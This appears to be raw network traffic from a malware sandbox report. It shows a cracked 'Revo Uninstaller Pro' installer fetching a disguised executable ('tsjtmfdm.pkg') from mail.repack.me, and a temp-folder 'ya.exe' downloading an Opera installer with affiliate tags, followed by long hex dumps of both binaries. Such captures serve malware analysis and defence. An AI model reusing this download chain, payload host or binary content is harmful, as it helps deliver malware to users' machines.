                                                                                                                                                                          2024-12-09 16:53:11 UTC41INData Raw: 32 33 0d 0a 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 72 65 70 61 63 6b 2e 6d 65 2f 74 73 6a 74 6d 66 64 6d 2e 70 6b 67 0d 0a
                                                                                                                                                                          Data Ascii: 23https://mail.repack.me/tsjtmfdm.pkg
                                                                                                                                                                          2024-12-09 16:53:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          1192.168.2.449737194.87.189.434437324C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-09 16:53:13 UTC135OUTGET /tsjtmfdm.pkg HTTP/1.1
                                                                                                                                                                          User-Agent: NSIS_Inetc (Mozilla)
                                                                                                                                                                          Host: mail.repack.me
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2024-12-09 16:53:14 UTC283INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx/1.26.2
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:53:13 GMT
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          Content-Length: 419886
                                                                                                                                                                          Last-Modified: Mon, 28 Oct 2024 17:07:02 GMT
                                                                                                                                                                          Connection: close
                                                                                                                                                                          ETag: "671fc4b6-6682e"
                                                                                                                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          2024-12-09 16:53:14 UTC16101INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 62 60 f7 f7 26 01 99 a4 26 01 99 a4 26 01 99 a4 92 9d 68 a4 2b 01 99 a4 92 9d 6a a4 ab 01 99 a4 92 9d 6b a4 3e 01 99 a4 b8 a1 5e a4 24 01 99 a4 1d 5f 9a a5 30 01 99 a4 1d 5f 9d a5 35 01 99 a4 1d 5f 9c a5 0a 01 99 a4 2f 79 1a a4 2c 01 99 a4 2f 79 0a a4 23 01 99 a4 26 01 98 a4 2c 00 99 a4 b1 5f 9c a5 17 01 99 a4 b1 5f 99 a5 27 01 99 a4 b4 5f 66 a4 27 01 99 a4 b1 5f 9b a5 27 01 99
                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b`&&&h+jk>^$_0_5_/y,/y#&,__'_f'_'
                                                                                                                                                                          2024-12-09 16:53:14 UTC16384INData Raw: 6e 44 24 24 66 0f 62 f8 66 0f 70 e9 93 66 0f 6e 4c 24 18 66 0f 62 ca 66 0f 62 f9 66 0f fe 7c 24 50 66 0f 6e 4c 24 14 66 0f fe fd 66 0f ef df 66 0f 6e d7 0f 28 c3 66 0f 62 ca 66 0f 72 d0 10 66 0f 72 f3 10 66 0f ef c3 66 0f 6e 5c 24 2c 0f 28 f0 0f 29 44 24 60 66 0f fe f4 0f 28 c6 66 0f ef c5 0f 28 e0 66 0f 72 d0 0c 66 0f 72 f4 14 66 0f ef e0 66 0f 6e 44 24 20 66 0f 62 d8 0f 28 44 24 60 66 0f 62 d9 66 0f fe df 66 0f fe dc 66 0f ef c3 0f 29 5c 24 50 0f 28 d8 66 0f 72 d0 08 66 0f 72 f3 18 66 0f ef d8 0f 28 d3 66 0f fe d6 0f 28 c2 66 0f ef c4 0f 28 c8 66 0f 72 d0 07 66 0f 72 f1 19 66 0f ef c8 66 0f 6e 7c 24 34 66 0f 6e 44 24 1c 66 0f 62 f8 66 0f 70 e9 39 66 0f 6e 4c 24 0c 66 0f 70 e2 4e 66 0f 6e 54 24 28 66 0f 62 ca 66 0f 62 f9 66 0f fe 7c 24 50 66 0f 70 db 93
                                                                                                                                                                          Data Ascii: nD$$fbfpfnL$fbfbf|$PfnL$fffn(fbfrfrffn\$,()D$`f(f(frfrffnD$ fb(D$`fbfff)\$P(frfrf(f(f(frfrffn|$4fnD$fbfp9fnL$fpNfnT$(fbfbf|$Pfp
                                                                                                                                                                          2024-12-09 16:53:14 UTC16384INData Raw: ff b0 d8 82 00 00 ff 36 e8 36 1c 00 00 8b 47 08 8d 8f a0 00 00 00 ff b0 d8 82 00 00 ff 36 e8 20 1c 00 00 8b 83 d8 32 00 00 8d 77 10 8b 8b dc 32 00 00 89 47 30 8d 85 a0 de ff ff 50 89 4f 34 8b ce 53 e8 50 3b 00 00 8a 55 f1 33 c9 8a 45 0b 88 57 39 88 47 3a 89 4d e4 89 4d d8 84 d2 0f 85 9d 00 00 00 38 8b c4 6c 00 00 0f 85 91 00 00 00 8b b3 e4 32 00 00 8b 93 e0 32 00 00 3b f1 7c 7e 7f 08 81 fa 40 42 0f 00 76 74 8b 8b d8 32 00 00 8b 83 dc 32 00 00 0f a4 c8 0a c1 e1 0a 3b c6 7c 58 7f 04 3b ca 76 52 33 c0 3b f0 7c 23 7f 08 81 fa 00 e1 f5 05 72 19 8b cb e8 3f 0b 00 00 3b 93 dc 32 00 00 7c 33 7f 08 3b 83 d8 32 00 00 76 29 ff b3 e4 32 00 00 8d 8d a0 de ff ff ff b3 e0 32 00 00 e8 0a 0d 00 00 8b 83 e0 32 00 00 89 45 e4 8b 83 e4 32 00 00 89 45 d8 8a 45 0b 33 c9 8d 77
                                                                                                                                                                          Data Ascii: 66G6 2w2G0PO4SP;U3EW9G:MM8l22;|~@Bvt22;|X;vR3;|#r?;2|3;2v)222E2EE3w
                                                                                                                                                                          2024-12-09 16:53:14 UTC16384INData Raw: ff 83 3e 00 74 3c 6b 46 08 0c 50 ff 36 57 e8 88 1f 01 00 6b 46 08 0c 83 c4 0c 50 ff 36 e8 50 1e 00 00 ff 36 e8 40 60 01 00 59 eb 16 ff 36 e8 46 60 01 00 8b f8 59 59 85 ff 75 07 8b cd e8 13 a2 ff ff 89 3e 5f 5d 89 5e 08 5b 5e c2 04 00 55 8b ec 8b 55 0c 83 ec 0c 80 3a 00 53 56 57 8b d9 74 78 8b 45 08 52 89 45 f4 e8 4e ae 01 00 59 8b 4d 10 89 45 f8 8b 45 14 6a 22 5f 85 c0 74 32 8d 50 ff 8d 14 51 0f b7 32 83 fe 20 74 05 83 fe 09 75 0d 33 f6 66 89 32 83 ea 02 83 e8 01 75 e6 85 c0 74 0e 66 39 7c 41 fe 75 07 33 d2 66 89 54 41 fe 33 d2 66 89 14 41 66 39 39 75 03 83 c1 02 51 e8 e3 9a 01 00 51 51 8b fc 89 45 fc 8d 75 f4 8d 4b 28 a5 a5 a5 e8 e1 0a 00 00 5f 5e 5b 8b e5 5d c2 10 00 55 8d 6c 24 90 8b 45 78 81 ec a0 00 00 00 8b 08 8b 45 7c 56 57 6b f9 0c 8b 30 8d 45 d0
                                                                                                                                                                          Data Ascii: >t<kFP6WkFP6P6@`Y6F`YYu>_]^[^UU:SVWtxERENYMEEj"_t2PQ2 tu3f2utf9|Au3fTA3fAf99uQQQEuK(_^[]Ul$ExE|VWk0E
                                                                                                                                                                          2024-12-09 16:53:14 UTC16384INData Raw: e8 93 9a 00 00 83 c4 0c e9 13 02 00 00 ff 36 68 30 30 43 00 68 38 30 43 00 eb e5 6a 00 e8 4e 92 00 00 59 e9 f8 01 00 00 ff 76 04 6a 7b e8 2b cf ff ff 50 ff 36 eb c9 ff 76 04 6a 7a eb ef ff 76 04 6a 7c eb e8 ff 76 04 68 ca 00 00 00 eb de 6a 70 e8 07 cf ff ff 50 6a 00 e8 3a 9a 00 00 59 eb c1 ff 76 04 6a 72 eb c5 ff 76 04 6a 78 eb be ff 36 68 85 00 00 00 e8 e2 ce ff ff 50 eb 80 ff 36 68 04 02 00 00 eb ef ff 76 04 68 84 00 00 00 eb 9c ff 76 04 68 83 00 00 00 eb 92 ff 76 08 ff 76 04 68 d2 00 00 00 e8 b2 ce ff ff 50 ff 36 e8 e5 99 00 00 83 c4 10 e9 65 01 00 00 ff 76 04 6a 79 e9 68 ff ff ff ff 76 04 68 dc 00 00 00 e9 5b ff ff ff ff 36 68 dd 00 00 00 eb 9b 83 f8 38 0f 8f ba 00 00 00 0f 84 ad 00 00 00 83 e8 17 83 f8 0b 0f 87 2a 01 00 00 ff 24 85 63 0d 41 00 68 de
                                                                                                                                                                          Data Ascii: 6h00Ch80CjNYvj{+P6vjzvj|vhjpPj:Yvjrvjx6hP6hvhvhvvhP6evjyhvh[6h8*$cAh
                                                                                                                                                                          2024-12-09 16:53:14 UTC16384INData Raw: 02 8b c8 51 ff 74 24 14 8b 0e e8 d3 7d ff ff 01 be 58 4c 00 00 11 9e 5c 4c 00 00 5f 5e 5b c2 08 00 83 ec 0c 83 3d 7c 74 44 00 00 53 55 56 8b f1 57 89 74 24 10 75 51 83 64 24 14 00 33 ff 33 ed 8b 1c bd f0 d0 43 00 85 db 7e 37 33 c0 8b cf 40 d3 e0 53 89 44 24 1c 8d 85 78 75 44 00 57 50 e8 d7 9d 00 00 8b 44 24 20 83 c4 0c 8b 4c 24 18 89 04 ad 78 74 44 00 45 03 c1 83 eb 01 75 f1 89 44 24 14 47 83 ff 13 72 b8 80 be 50 4c 00 00 00 c6 86 60 4c 00 00 01 75 39 ff 74 24 20 8b ce e8 50 f7 ff ff 8b ce e8 04 f8 ff ff 84 c0 0f 84 7d 0c 00 00 80 7c 24 20 00 74 09 80 be 61 e6 00 00 00 75 0f 8b ce e8 a0 ea ff ff 84 c0 0f 84 5e 0c 00 00 8b 86 dc e6 00 00 8d 5e 04 21 46 7c 8b 03 3b 86 88 00 00 00 7e 0f 8b ce e8 c0 f7 ff ff 84 c0 0f 84 32 0c 00 00 8b 8e 80 00 00 00 8b c1 2b
                                                                                                                                                                          Data Ascii: Qt$}XL\L_^[=|tDSUVWt$uQd$33C~73@SD$xuDWPD$ L$xtDEuD$GrPL`Lu9t$ P}|$ tau^^!F|;~2+
                                                                                                                                                                          2024-12-09 16:53:14 UTC16384INData Raw: 00 00 8b f8 89 7c 24 14 59 59 85 ff 75 07 8b c5 e9 e1 00 00 00 53 56 68 18 33 43 00 57 e8 77 c2 00 00 57 e8 26 a0 00 00 8b d8 83 c4 0c 33 c0 8b f5 66 39 45 00 0f 84 aa 00 00 00 6a 0d 59 6a 0a 5a 0f b7 06 66 3b c1 75 5c 66 39 56 02 75 56 6a 0d 5a 8d 4e 04 66 39 11 6a 0a 89 4c 24 14 5a 75 44 66 39 56 06 75 3e 52 8d 2c 5f 5f 66 39 7e 06 75 26 68 e4 32 43 00 55 e8 1c c2 00 00 8b 74 24 18 83 c3 04 59 59 6a 0d 8d 46 04 83 c5 08 59 89 44 24 10 66 39 08 74 d4 8b 7c 24 14 83 c6 02 8b 6c 24 1c eb 25 3b f5 76 26 6a 20 59 66 3b c1 75 1e 66 39 4e fe 75 18 8d 04 5f 68 88 33 43 00 50 e8 d4 c1 00 00 59 59 83 c3 06 6a 0a 5a eb 05 66 89 04 5f 43 83 c6 02 33 c0 6a 0d 59 66 39 06 0f 85 5c ff ff ff 33 c0 55 66 89 04 5f e8 78 9f 00 00 59 5e 8b c7 5b 5f 5d 59 59 c2 04 00 55 8b
                                                                                                                                                                          Data Ascii: |$YYuSVh3CWwW&3f9EjYjZf;u\f9VuVjZNf9jL$ZuDf9Vu>R,__f9~u&h2CUt$YYjFYD$f9t|$l$%;v&j Yf;uf9Nu_h3CPYYjZf_C3jYf9\3Uf_xY^[_]YYU
                                                                                                                                                                          2024-12-09 16:53:14 UTC16384INData Raw: 74 0e 6a 40 59 8b f3 bf 02 b6 44 00 f3 a5 66 a5 5b 5f 5e 8b e5 5d c2 10 00 55 8b ec b8 00 14 00 00 e8 35 0e 00 00 ff 75 0c e8 30 ee fe ff 50 33 c0 80 7d 08 54 0f 95 c0 48 25 7e 01 00 00 05 8d 00 00 00 50 e8 14 0f ff ff 50 8d 85 00 ec ff ff 68 00 0a 00 00 50 e8 01 73 fe ff 83 c4 10 8d 85 00 ec ff ff 50 6a 00 e8 3f f6 ff ff 8b e5 5d c2 08 00 55 8b ec b8 00 14 00 00 e8 dc 0d 00 00 80 7d 14 00 ff 75 08 74 04 6a 66 eb 02 6a 65 e8 ca 0e ff ff 50 8d 85 00 ec ff ff 68 00 0a 00 00 50 e8 b7 72 fe ff 83 c4 10 8d 85 00 ec ff ff 50 6a 65 ff 35 c8 75 44 00 ff 15 cc df 43 00 e8 e1 d7 ff ff 33 c0 38 05 d7 75 44 00 0f 94 c0 8b e5 5d c2 10 00 81 ec d4 00 00 00 53 56 57 6a 01 e8 81 31 ff ff 68 00 08 00 00 68 f8 75 44 00 e8 21 ca ff ff 8d 4c 24 1c e8 c0 ce ff ff b9 70 73 44
                                                                                                                                                                          Data Ascii: tj@YDf[_^]U5u0P3}TH%~PPhPsPj?]U}utjfjePhPrPje5uDC38uD]SVWj1hhuD!L$psD
                                                                                                                                                                          2024-12-09 16:53:14 UTC16384INData Raw: 00 d4 08 42 00 ba fb 41 00 c1 ff 41 00 06 04 42 00 3d 08 42 00 22 fb 41 00 2a ff 41 00 6f 03 42 00 a5 07 42 00 8b fa 41 00 93 fe 41 00 d8 02 42 00 0e 07 42 00 f4 f9 41 00 fc fd 41 00 41 02 42 00 77 06 42 00 5d f9 41 00 65 fd 41 00 aa 01 42 00 e0 05 42 00 c6 f8 41 00 de fc 41 00 13 01 42 00 48 05 42 00 55 8b ec 83 ec 20 53 8b 5d 08 56 57 6a 08 59 be b8 42 43 00 8d 7d e0 f3 a5 8b 7d 0c 85 ff 74 1c f6 07 10 74 17 8b 0b 83 e9 04 51 8b 01 8b 70 20 8b ce 8b 78 18 e8 59 d7 ff ff ff d6 89 5d f8 89 7d fc 85 ff 74 0c f6 07 08 74 07 c7 45 f4 00 40 99 01 8d 45 f4 50 ff 75 f0 ff 75 e4 ff 75 e0 ff 15 94 21 43 00 5f 5e 5b 8b e5 5d c2 08 00 53 8b dc 51 51 83 e4 f0 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 8b 4b 08 83 ec 20 83 3d a0 fe 45 00 01 66 8b 53 0c 7c 46 0f b7 c2 66
                                                                                                                                                                          Data Ascii: BAAB=B"A*AoBBAABBAAABwB]AeABBAABHBU S]VWjYBC}}ttQp xY]}ttE@EPuuu!C_^[]SQQUkl$K =EfS|Ff
                                                                                                                                                                          2024-12-09 16:53:14 UTC16384INData Raw: 83 4e 18 ff eb 18 ff 76 0c 8d 46 18 50 ff 76 38 8d 8e 48 04 00 00 ff 76 34 e8 a0 00 00 00 8b 4d fc b0 01 5f 5e 33 cd 5b e8 f1 96 ff ff 8b e5 5d c2 04 00 8b ff 55 8b ec 51 51 53 56 8b f1 57 80 7e 3c 00 75 56 8b 46 38 85 c0 7e 4f 8b 5e 34 33 ff 85 c0 74 5e 33 c0 66 89 45 fc 8b 46 08 50 8b 00 ff 70 04 8d 45 fc 53 50 e8 ff 33 00 00 83 c4 10 89 45 f8 85 c0 7e 1d 8d 4e 18 51 ff 75 fc 8d 8e 48 04 00 00 e8 bd fe ff ff 03 5d f8 47 3b 7e 38 75 c2 eb 1e 83 4e 18 ff eb 18 ff 76 0c 8d 46 18 50 ff 76 38 8d 8e 48 04 00 00 ff 76 34 e8 9e 00 00 00 5f 5e b0 01 5b 8b e5 5d c2 04 00 8b ff 55 8b ec 51 51 56 57 8b 7d 14 8b c1 89 45 f8 8b 0f 83 27 00 8b 00 89 4d fc 8b 70 04 39 70 08 75 18 80 78 0c 00 74 0a 8b 4d 10 8b 45 0c 01 01 eb 4a 8b 45 10 83 08 ff eb 45 2b 70 08 53 8b 5d
                                                                                                                                                                          Data Ascii: NvFPv8Hv4M_^3[]UQQSVW~<uVF8~O^43t^3fEFPpESP3E~NQuH]G;~8uNvFPv8Hv4_^[]UQQVW}E'Mp9puxtMEJEE+pS]


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          2192.168.2.449824107.167.96.304434420C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-09 16:54:02 UTC196OUTGET /opera/stable/windows?utm_source=DWNLST&utm_medium=apb&utm_campaign=r10 HTTP/1.1
                                                                                                                                                                          User-Agent: NSIS_Inetc (Mozilla)
                                                                                                                                                                          Host: net.geo.opera.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          2024-12-09 16:54:02 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 09 Dec 2024 16:54:02 GMT
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Disposition: attachment; filename=OperaSetup.exe
                                                                                                                                                                          ETag: "5a1105f1c25a60b128d45ec03041bf48"
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                          2024-12-09 16:54:02 UTC16062INData Raw: 31 66 36 31 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4e 0c c9 d7 0a 6d a7 84 0a 6d a7 84 0a 6d a7 84 41 15 a4 85 07 6d a7 84 41 15 a2 85 ba 6d a7 84 c8 ec a2 85 5f 6d a7 84 c8 ec a3 85 1e 6d a7 84 c8 ec a4 85 1d 6d a7 84 41 15 a3 85 1c 6d a7 84 41 15 a6 85 03 6d a7 84 0a 6d a6 84 c1 6d a7 84 f9 ef af 85 5c 6d a7 84 f9 ef 58 84 0b 6d a7 84 0a 6d 30 84 0b 6d a7 84 f9 ef a5 85 0b 6d a7 84 52 69 63 68 0a 6d a7 84 00
                                                                                                                                                                          Data Ascii: 1f61MZ@!L!This program cannot be run in DOS mode.$NmmmAmAm_mmmAmAmmm\mXmm0mmRichm
                                                                                                                                                                          2024-12-09 16:54:02 UTC16384INData Raw: 05 2b d8 2b f8 46 8b 45 ec 83 fe 40 72 be 83 ee 40 83 fe 04 0f 82 c3 00 00 00 8b ce d1 e9 49 83 fe 0e 73 18 8b 45 fc 83 e6 01 83 ce 02 d3 e6 8d 04 70 05 00 f3 ff ff 89 45 fc eb 3b 83 e9 04 81 fb 00 00 00 01 73 17 8b 45 08 3b 10 0f 83 9d 00 00 00 0f b6 02 c1 e7 08 c1 e3 08 0b f8 42 d1 eb 8b c7 2b c3 c1 e8 1f 48 23 c3 2b f8 83 e9 01 75 ce 8b 45 fc 6a 04 59 33 f6 46 89 75 e8 8b 75 f4 0f b7 04 70 8b 75 e8 89 45 e0 81 fb 00 00 00 01 73 13 8b 45 08 3b 10 73 56 0f b6 02 c1 e7 08 c1 e3 08 0b f8 42 8b c3 c1 e8 0b 0f af 45 e0 89 45 e0 8d 04 36 89 45 e4 8b 45 e0 3b f8 73 0a 01 75 f4 8b d8 8b 75 e4 eb 0a 8b 75 e4 2b d8 2b f8 01 75 f4 8b 45 fc 89 75 e8 83 e9 01 75 a0 8b 45 f0 8b 4d 08 81 fb 00 00 00 01 73 09 3b 11 72 04 33 c0 eb 03 42 89 11 5f 5e 5b c9 c2 04 00 55 8b
                                                                                                                                                                          Data Ascii: ++FE@r@IsEpE;sE;B+H#+uEjY3FuupuEsE;sVBEE6EE;suuu++uEuuEMs;r3B_^[U
                                                                                                                                                                          2024-12-09 16:54:02 UTC16384INData Raw: e0 dc ff ff 8d 4d e8 e8 40 e6 ff ff 33 db 8d 4d e8 89 5d fc e8 2d fe ff ff 84 c0 74 54 68 c4 40 44 00 8d 4d e8 e8 e6 e8 ff ff 8d 4d dc e8 0d e3 ff ff 51 8d 45 dc c6 45 fc 01 50 8d 4d e8 e8 ad dc ff ff 8b c8 e8 64 fe ff ff 84 c0 74 1b 8d 45 e8 8b cf 50 e8 13 e7 ff ff 8d 45 dc 8b cf 50 e8 c8 f7 ff ff c6 06 01 b3 01 8d 4d dc e8 54 dc ff ff 8d 4d e8 e8 4c dc ff ff 8a c3 e8 c8 05 03 00 c2 04 00 56 8b f1 80 3e 00 75 04 b0 01 5e c3 8d 4e 04 e8 97 fa ff ff 8a c8 80 f1 01 88 0e 5e c3 55 8b ec 8b 51 04 2b 55 08 8b 01 8d 04 50 5d c2 04 00 6a 2a e8 49 dc ff ff c2 04 00 55 8b ec 8b 55 08 8b 09 e8 b3 e0 ff ff 0d 0a 35 30 30 30 0d 0a 5d c2 04 00 6a 02 e8 4c f5 ff ff c2 04 00 83 21 00 83 61 04 00 c3 83 09 ff 8b c1 c6 41 04 00 c3 e9 3a 09 00 00 55 8b ec ff 75 08 ff 31 ff
                                                                                                                                                                          Data Ascii: M@3M]-tTh@DMMQEEPMdtEPEPMTMLV>u^N^UQ+UP]j*IUU5000]jL!aA:Uu1
                                                                                                                                                                          2024-12-09 16:54:02 UTC16384INData Raw: e8 a6 da ff ff 8d 4e 38 e8 9e da ff ff 8d 4e 3c e8 f6 ee ff ff 8d 4e 44 e8 92 ff ff ff 8b c6 5e c3 56 8b f1 83 26 00 8d 4e 08 e8 67 0a 00 00 83 66 04 00 8d 4e 0c e8 fd fe ff ff 8d 4e 24 e8 53 0a 00 00 8d 4e 28 e8 4b 0a 00 00 8d 4e 2c e8 43 0a 00 00 8d 4e 30 e8 3b 0a 00 00 8d 4e 34 e8 33 0a 00 00 8d 4e 38 e8 2b 0a 00 00 8d 4e 3c 5e e9 20 b2 ff ff 8b d1 e8 5c 9e ff ff 8d 4a 0c e8 54 9e ff ff 8b c2 c3 56 8b f1 e8 93 ff ff ff 8d 8e e8 00 00 00 e8 fb b1 ff ff 8d 8e f0 00 00 00 e8 f2 09 00 00 8d 4e 58 e8 26 9e ff ff 8d 4e 64 e8 84 fe ff ff 8d 4e 7c e8 7c fe ff ff 8d 8e 94 00 00 00 e8 71 fe ff ff 8d 8e ac 00 00 00 e8 66 fe ff ff 8d 8e c4 00 00 00 e8 5b fe ff ff 8d 8e dc 00 00 00 5e e9 e9 9d ff ff 33 c0 89 41 08 89 41 0c 89 41 10 89 41 14 89 41 18 89 41 1c 89 41
                                                                                                                                                                          Data Ascii: N8N<ND^V&NgfNN$SN(KN,CN0;N43N8+N<^ \JTVNX&NdN||qf[^3AAAAAAA
                                                                                                                                                                          2024-12-09 16:54:02 UTC16384INData Raw: 33 ff e8 e1 5c ff ff 85 c0 74 15 8d 4e 68 e8 49 07 00 00 8d 4e 10 47 e8 cc 5c ff ff 3b f8 72 eb 5f 5e 33 c0 5b 5d c2 04 00 55 8b ec 53 56 57 8b 7d 08 8b d9 0f b6 47 09 8d 4b 44 50 e8 77 07 00 00 0f b6 47 08 8d 4b 50 50 e8 6a 07 00 00 8d 4b 74 e8 a7 06 00 00 8b 4f 0c 8b f0 57 89 4e 20 8d 4e 18 e8 fa bc ff ff 8d 4f 04 51 8d 4e 1c e8 ee bc ff ff 8a 43 5c 5f 88 46 68 5e 5b 5d c2 04 00 55 8b ec ff 75 08 83 c1 74 e8 d0 5d ff ff 83 c0 18 5d c2 04 00 56 57 8d 79 68 33 f6 8b cf e8 d4 5d ff ff 85 c0 74 1f 56 8b cf e8 af 5d ff ff 8b c8 e8 c0 25 00 00 85 c0 75 0e 8b cf 46 e8 b5 5d ff ff 3b f0 72 e1 33 c0 5f 5e c3 55 8b ec 80 7d 08 00 56 8b f1 57 8b 7e 28 75 69 53 57 8d 4e 74 e8 79 5d ff ff 83 78 20 01 75 58 8d 46 44 57 8b c8 e8 8b bc ff ff 80 38 00 74 48 57 8d 4e 2c
                                                                                                                                                                          Data Ascii: 3\tNhING\;r_^3[]USVW}GKDPwGKPPjKtOWN NOQNC\_Fh^[]Uut]]VWyh3]tV]%uF];r3_^U}VW~(uiSWNty]x uXFDW8tHWN,
                                                                                                                                                                          2024-12-09 16:54:02 UTC16384INData Raw: 83 e8 01 89 41 28 75 08 51 e8 06 00 00 00 33 c0 5d c2 04 00 56 8b f1 e8 9c 00 00 00 6a 78 56 e8 a2 c1 00 00 59 59 8b c6 5e c2 04 00 56 8b f1 8d 4e 28 e8 7c 5a ff ff 33 c9 c7 06 28 3b 44 00 b8 00 00 10 00 89 4e 2c 89 46 40 89 46 44 33 c0 40 89 4e 30 89 4e 34 89 4e 3c 89 4e 54 8d 4e 58 c7 46 04 14 3b 44 00 c7 46 08 00 3b 44 00 c7 46 0c ec 3a 44 00 c7 46 10 d4 3a 44 00 c7 46 14 bc 3a 44 00 c7 46 18 a8 3a 44 00 c7 46 1c 94 3a 44 00 c7 46 20 80 3a 44 00 c7 46 24 6c 3a 44 00 c6 46 38 ff 89 46 48 89 46 4c c7 46 50 00 00 00 40 e8 ff 59 ff ff 8b c6 5e c3 55 8b ec 6a ff 68 8c 9b 43 00 64 a1 00 00 00 00 50 56 a1 40 b0 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 8b 4e 2c c7 06 28 3b 44 00 c7 46 04 14 3b 44 00 c7 46 08 00 3b 44 00 c7 46 0c ec 3a 44 00 c7 46 10 d4
                                                                                                                                                                          Data Ascii: A(uQ3]VjxVYY^VN(|Z3(;DN,F@FD3@N0N4N<NTNXF;DF;DF:DF:DF:DF:DF:DF :DF$l:DF8FHFLFP@Y^UjhCdPV@D3PEdN,(;DF;DF;DF:DF
                                                                                                                                                                          2024-12-09 16:54:03 UTC16384INData Raw: 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8a 46 03 88 47 03 8b 46 04 89 47 04 8b 46 08 89 47 08 8b 46 0c 89 47 0c 8b 46 10 8b 4e 14 89 47 10 8d 46 18 89 4f 14 8d 4f 18 50 e8 ba e6 fe ff 83 65 fc 00 8d 46 24 50 8d 4f 24 e8 aa e6 fe ff 8b c7 e8 09 06 02 00 c2 04 00 55 8b ec 6a ff 68 74 9c 43 00 64 a1 00 00 00 00 50 a1 40 b0 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 09 ff 75 0c 68 70 34 44 00 8b 01 51 ff 10 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c2 08 00 cc cc cc cc cc 55 8b ec 6a ff 68 74 9c 43 00 64 a1 00 00 00 00 50 a1 40 b0 44 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 09 ff 75 0c 68 a0 33 44 00 8b 01 51 ff 10 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c2 08 00 cc cc cc cc cc 83 6c 24 04 04 e9 9d e0 ff ff 83 6c 24 04 08 e9 93 e0 ff ff 83 6c 24 04 0c e9 89
                                                                                                                                                                          Data Ascii: FGFGFGFGFGFGFNGFOOPeF$PO$UjhtCdP@D3PEduhp4DQMdYUjhtCdP@D3PEduh3DQMdYl$l$l$
                                                                                                                                                                          2024-12-09 16:54:03 UTC16384INData Raw: 8b 48 04 8d 41 98 89 44 31 fc 8b c6 5e c9 c2 10 00 6a 08 b8 2a ad 43 00 e8 66 c6 01 00 6a 00 8d 4d ec e8 0b 4f 00 00 83 65 fc 00 b9 b4 db 44 00 8b 3d a0 db 44 00 89 7d f0 e8 d7 dc ff ff 8b 4d 08 50 e8 ce dd ff ff 8b f0 85 f6 75 4f 85 ff 74 04 8b f7 eb 47 ff 75 08 8d 45 f0 50 e8 b5 03 00 00 59 59 83 f8 ff 74 44 8b 75 f0 8d 4d f0 56 e8 7b 08 00 00 56 c6 45 fc 01 e8 e7 51 00 00 8b 06 59 8b ce ff 50 04 8d 4d f0 89 35 a0 db 44 00 e8 5c 03 00 00 8d 4d f0 e8 66 03 00 00 8d 4d ec e8 e6 4e 00 00 8b c6 e8 b5 c5 01 00 c3 e8 f4 da ff ff cc e8 30 9e fe ff 8b c1 c2 04 00 ff 32 e8 83 05 00 00 c3 56 8b f1 e8 66 05 00 00 8b c6 5e c2 08 00 56 8b f1 e8 58 05 00 00 8b c6 5e c2 04 00 55 8b ec 51 53 56 57 8b f1 e8 07 05 00 00 8b 7d 0c 3b f8 0f 87 81 00 00 00 6a 0f 5b 8b ce 3b
                                                                                                                                                                          Data Ascii: HAD1^j*CfjMOeD=D}MPuOtGuEPYYtDuMV{VEQYPM5D\MfMN02Vf^VX^UQSVW};j[;
